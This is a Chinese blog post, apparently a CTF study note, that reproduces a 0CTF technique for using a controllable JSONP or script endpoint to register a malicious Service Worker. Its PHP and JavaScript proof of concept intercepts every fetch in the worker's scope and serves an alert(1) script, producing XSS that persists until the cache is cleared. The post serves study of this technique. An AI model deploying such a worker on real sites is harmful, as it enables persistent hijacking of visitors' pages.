如何利用/防禦 Service Worker

最新推荐文章于 2024-08-02 16:40:33 发布
最新推荐文章于 2024-08-02 16:40:33 发布
阅读量210 收藏
点赞数
分类专栏: CTF

https://hk.saowen.com/a/02abd976c3348e09e374b24be8c4a94ae2dde23ddfac6f3dc63025237b19a96c

上午看到相关0ctf里有相关wp,尝试自己复现


理解:

需要能控制 .js 文件或者 jsonp 弱验证,危害是,如果serviceworker注册成功

那么同目录下文件都能被控制,而且清空缓存才可以结束XSS


复现:

jsonp.php (省事,于是直接echo了js代码)

<?php
header('Content-type: application/javascript');
echo "onfetch = function(e) {
	body = '<script>alert(1)</script>' ; 
	init = { headers : { 'content-type' : 'text/html' } } ; 
	e.respondWith(
		new Response(body,init)
	);
}";
?>

index.php (存在xss的地方)

<!DOCTYPE html>
<html>
<head>
	<title></title>
	<meta charset="utf-8">
</head>
<body>

<script>
if ('serviceWorker' in navigator) {
 navigator.serviceWorker.register('http://localhost/ServiceWorker/1.php')
 .then(function(registration) {
 console.log('ServiceWorker registration successful with scope: ', registration.scope);
 })
};

</script>

</body>

</html>

访问index.php之后,console不报错就是注册成功,再次刷新即可发现弹窗。

PD_3569
关注
专栏目录
ctf xss利用_TCTF/0CTF2018 XSS Writeup
weixin_29923451的博客
01-14 559
作者:LoRexxar'@知道创宇404实验室刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过strict-dynamicCSP的利用方式。h4xors.club2则是通过Script Gadgets和postmes...
低成本防御网站 DDOS 攻击
wulanlin的博客
01-06 214
前言 传统的 DDOS 防御通常使用“硬抗”的方式,导致开销很大,而且有时效果并不好。例如使用 DNS 切换故障 IP 的方案,由于域名会受到缓存等因素的影响通常有分钟级延时,前端难以快速生效。例如使用 CDN 服务,虽可抵挡大多网络层攻击,但对应用层攻击却常有疏漏,攻击者可通过恶意请求消耗流量、日志存储等费用,导致欠费停止服务。例如购买流量清洗等服务,虽然效果不错但费用十分昂贵。 今天分享一种超低成本的网站 DDOS 防御方案 —— 不使用任何后端防御服务,纯前端实现!当然效果也非常极端:如果用户之前
前端性能优化方案(gz,serviceWorker
小程子的博客
11-18 546
一、问题场景 1、在网络不稳定的情况下,页面访问速度不稳定 2、在网络稳定、前端资源较大的情况下,页面访问速度较慢 二、调研思路 1、在首次访问页面时,静态资源需要从服务器拉取;那如何做到除首次访问,不需要从服务器再去拉取静态资源; 2、在架构项目中(vue,react),chunk-vendors.js体积的大小决定这首屏渲染的速度;如何能做到减少chunk-vendors.js的体积或者提升它的加载速度; 三、解决方案 1、在架构项目解决加载和文件体积; 1、路由懒加载方式; 根据访问的路由去加载路由
Service Worker
肖的博客
08-27 390
基本特性 不能直接访问/操作 DOM(只能使用特定的 API:Promise、Fetch API、Cache API) 需要时直接唤醒,不需要时自动休眠 离线缓存内容开发者可控 一旦被安装则永远存活,除非手动卸载 必须在 HTTPS 环境下工作(本地环境 localhost 除外) 广泛使用了 Promise 使用 生命周期相关知识 install 阶段缓存文件列表 activate 阶...
Service Worker 入门 - PWA 强依赖于 Service Worker
张同光 (Tongguang Zhang):Hello everyone !
12-19 5731
Service Worker 入门 - PWA 强依赖于 Service Worker
XSS漏洞原理和利用
热门推荐
VictorZhang
08-09 1万+
XSS漏洞原理和利用 1.XSS介绍及原理 XSS又叫CSS(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往Web页面 里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而 达到恶意的特殊目的。 利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行, 访问该页面的用户则被攻击。 XSS漏洞分类 1.反射型 非存储型...
HTTP Flood攻击与防御原理
zhoupenghui168的博客
04-07 4454
HTTP Flood攻击与防御原理,以及防御方法
CORS配置漏洞/jsonp劫持
weixin_71093833的博客
08-02 2079
cors漏洞简单摘要
nginx防御简单CC攻击的方法
IChen.的博客
07-03 1405
简介: CC攻击可以归为DDoS攻击的一种。他们之间都原理都是一样的,即发送大量的请求数据来导致服务器拒绝服务,是一种连接攻击。CC攻击又可分为代理CC攻击,和肉鸡CC攻击。代理CC攻击是黑客借助代理服务器生成指向受害主机的合法网页请求,实现DOS,和伪装就叫:cc(ChallengeCollapsar)。而肉鸡CC攻击是黑客使用CC攻击软件,控制大量肉鸡,发动攻击,相比来后者比前者更难防御。因为肉鸡可以模拟正常用户访问网站的请求。伪造成合法数据包。防御CC攻击可以通过多种方法,禁止网站代理访问,尽量将网站
什么是ddos攻击,如何低成本防御ddos攻击?
A1_3_9_7的博客
12-25 2259
DDoS是Distributed Denial of Service的缩写,即分布式拒绝服务。
星球防御网页版HTML5源码
03-19
还有可能利用Service Worker实现离线缓存,即使在网络不稳定的情况下,玩家也能继续游戏。 总的来说,“星球防御”HTML5网页版源码展示了HTML5、CSS3和JavaScript在游戏开发中的强大能力。通过分析源码,我们可以...
awesome-cloudflare::sun_behind_cloud:精选的Cloudflare工作人员食谱,开源项目,指南,博客和其他资源的清单
02-01
- **Service Worker**: Service Worker是Web平台的一个技术,可以在浏览器后台运行,使得开发者能够实现离线缓存、推送通知等功能。Cloudflare Workers与Service Worker类似,但部署在全球的边缘节点上,可以更快速...
Nginx教程 防御ddos,用户访问控制,限流.zip
01-09
本教程将围绕如何利用Nginx进行DDoS防御、用户访问控制以及流量和并发连接数限制展开。 **一、防御DDoS攻击** DDoS(Distributed Denial of Service)分布式拒绝服务攻击是一种常见的网络安全威胁,通过大量恶意...
重庆对外经贸学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
湖北大学在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
西安培华学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
yolo算法-自动驾驶道路交通锥数据集-110张图像带标签-蓝黄色automatic-v62ff.zip
最新发布
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
欧姆龙plc55个程序,三层提升机,冲床,自动模切机,啤机,灌装机,双翻分拣机,铬化机,螺纹钢生产线,超声波清洗机等等
10-31
三层提升机欧姆龙CQM1H程序.rar 三菱400吨和200号冲床程序.rar 上海产自动模切机飞达部程序.zip 上海狮印全自动啤机程序.rar 两步法吹瓶机.rar 买书的随书样例.rar 井研磨边机.rar 利慧利乐灌装机程序.rar 南京印刷机.zip 双翻分拣机.rar 双边机.rar 台湾产染色机欧姆龙PLC带3只IO扩展控制程序.rar 台湾大拉无板.rar 啤酒厂酒瓶美容机.rar 四川绵阳建丰热磨工段.rar 挡砖磨边机(新1).rar 捷豹空压机控制程序.rar 料位显示.rar 抛光研磨.rar 成型磨床控制程序(附注释)欧姆龙CPM1A.rar 模拟量试验.rar 欧姆龙CJ1M铬化机程序带注释.rar 欧姆龙CP1H例程.rar 欧姆龙CPM1A的PLC.rar 欧姆龙CPM2AH PLC和欧姆龙NTZ触摸屏编写的超声波清洗机程序..rar 欧姆龙CPM2AH Host Link通讯程序(发布源码).rar 欧姆龙CPM2A 螺纹钢生产线的PLC程序.rar 欧姆龙PLC与富士变频器Modbus通讯.rar 欧姆龙PLC主从HOSTLINK通讯实例程序等等.
长安大学在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
service worker
07-27
Service Worker是一种在Web浏览器背后运行的脚本,它可以独立于Web页面进行操作。它是一个浏览器功能,允许开发人员将一些任务(例如网络请求、缓存文件等)在后台线程中运行,这样可以提供更好的性能和离线体验。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值